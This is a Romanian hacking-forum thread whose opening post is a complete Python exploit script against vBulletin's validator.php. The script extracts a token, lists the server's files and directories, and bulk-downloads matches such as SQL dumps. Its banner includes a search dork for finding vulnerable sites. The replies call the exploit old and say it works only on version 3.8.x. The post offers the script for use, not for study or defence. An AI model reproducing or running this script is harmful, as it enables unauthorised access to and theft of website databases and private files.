Aripipevant Posted May 28, 2013 Report Share Posted May 28, 2013 #! /usr/bin/env python3.1################################################################## ____ _ _ _ _ (validator.php) ## | _ \ | | | | | (_) ## __ _| |_) |_ _| | | ___| |_ _ _ __ ## \ \ / / _ <| | | | | |/ _ \ __| | '_ \ ## \ V /| |_) | |_| | | | __/ |_| | | | | ## \_/ |____/ \__,_|_|_|\___|\__|_|_| |_| ## @expl0it... ################################################################## [ vBulletin Files / Directories Full Disclosure ] ################################################################## #################################################################import os, sys, urllib.request, urllib.parse, threadingdef main():logo = """\t |---------------------------------------------------------------|\t | ____ _ _ _ _ (TM) |\t | | _ \ | | | | | (_) |\t | __ _| |_) |_ _| | | ___| |_ _ _ __ |\t | \ \ / / _ <| | | | | |/ _ \ __| | '_ \ |\t | \ V /| |_) | |_| | | | __/ |_| | | | | |\t | \_/ |____/ \__,_|_|_|\___|\__|_|_| |_| |\t | |\t | vBulletin Full Disclosure expl0it |\t | Written by cmiN |\t | Vulnerability discovered by ******* |\t | |\t | Dork: intext:"Powered by vBulletin" |\t | Visit: www.insecurity.ro & www.darkc0de.com |\t |---------------------------------------------------------------|"""usage = """|---------------------------------------------------------------||Usage: vbfd.py scan http://www.site.com/vB_folder || vbfd.py download *.sql -> all || vbfd.py download name.jpg -> one ||---------------------------------------------------------------|"""if sys.platform in ("linux", "linux2"):clearing = "clear"else:clearing = "cls"os.system(clearing)print(logo)args = sys.argvif len(args) == 3:try:print("Please wait...")if args[1] == "scan":extract_parse_save(args[2].strip("/"))elif args[1] == "download":download_data(args[2])except Exception as message:print("An error occurred: {}".format(message))except:print("Unknown error.")else:print("Ready!")else:print(usage)input()def extract_parse_save(url):print("[+]Extracting content...")hurl = url + "/validator.php"with urllib.request.urlopen(hurl) as usock:source = usock.read().decode()print("[+]Finding token...")word = "validate('"source = source[source.index(word) + len(word):]value = source[:source.index("'")]print("[+]Obtaining paths...")hurl = url + "/validator.php?op={}".format(value)with urllib.request.urlopen(hurl) as usock:lastk, lastv = None, Nonedictionary = dict()for line in usock:line = line.decode()index = line.find("<td>")if index != -1:lastk = line[index + 4:line.index("</td>")].strip(" ")index = line.find("<strong>")if index != -1:lastv = line[index + 8:line.index("</strong>")].strip(" ")if lastk != None and lastv != None:index = lastk.rfind(".")if index in (-1, 0):lastk = "[other] {}".format(lastk)else:lastk = "[{}] {}".format(lastk[index + 1:], lastk)dictionary[lastk] = lastvlastk, lastv = None, Noneprint("[+]Organizing and saving paths...")with open("vBlogs.txt", "w") as fout:fout.write(url + "\n")keys = sorted(dictionary.keys())for key in keys:fout.write("{} ({})\n".format(key, dictionary[key]))def download_data(files):print("[+]Searching and downloading files...")mthreads = 50with open("vBlogs.txt", "r") as fin:url = fin.readline().strip("\n")if files.find("*") == -1:hurl = url + "/" + files.strip("/")Download(hurl).start()else:ext = files[files.rindex(".") + 1:]for line in fin:pieces = line.strip("\n").split(" ")if pieces[0].count(ext) == 1:upath = pieces[1]hurl = url + "/" + upath.strip("/")while threading.active_count() > mthreads:passDownload(hurl).start()while threading.active_count() > 1:passclass Download(threading.Thread):def __init__(self, url):threading.Thread.__init__(self)self.url = urldef run(self):try:with urllib.request.urlopen(self.url) as usock:data = usock.read()uparser = urllib.parse.urlparse(usock.geturl())pieces = uparser.path.split("/")fname = pieces[len(pieces) - 1]with open(fname, "wb") as fout:fout.write(data)except:passif __name__ == "__main__":main()Sursa: https://securityoversight.net/forum/index.php?/topic/127-vbulletin-validatorphp-exploit/ Quote Link to comment Share on other sites More sharing options...
P1CkL0Ck Posted May 28, 2013 Report Share Posted May 28, 2013 Chestia asta dateaza de ceva timp este valabila si pentru ipb nulled. Cred ca majoritatea de aici stiau de ea deci ... Quote Link to comment Share on other sites More sharing options...
Cheater Posted May 28, 2013 Report Share Posted May 28, 2013 Mai ales ca e scrisa de un tip de pe aici Quote Link to comment Share on other sites More sharing options...
wind Posted May 28, 2013 Report Share Posted May 28, 2013 E veche rau, pax a mai postat-o . Quote Link to comment Share on other sites More sharing options...
Aripipevant Posted May 29, 2013 Author Report Share Posted May 29, 2013 Da este adev?rat ca a mai fost postat?, de astfel este o adevarat? necesitate pentru unii, scuzele mele creatorului. Quote Link to comment Share on other sites More sharing options...
Password007 Posted June 30, 2013 Report Share Posted June 30, 2013 poti da mai multe detalii?Chestia asta dateaza de ceva timp este valabila si pentru ipb nulled. Cred ca majoritatea de aici stiau de ea deci ... Quote Link to comment Share on other sites More sharing options...
florinul Posted June 30, 2013 Report Share Posted June 30, 2013 nu merge Quote Link to comment Share on other sites More sharing options...
nein Posted June 30, 2013 Report Share Posted June 30, 2013 nu mergehaoleo frate ! 2010 ESTI CHIOR MA SA BAG PICIORU .merge doar pe 3.8.x vai SI AI REP POWER 3 , DUTEEEEEEEEEEEEEEEEEEE TAI'O Quote Link to comment Share on other sites More sharing options...
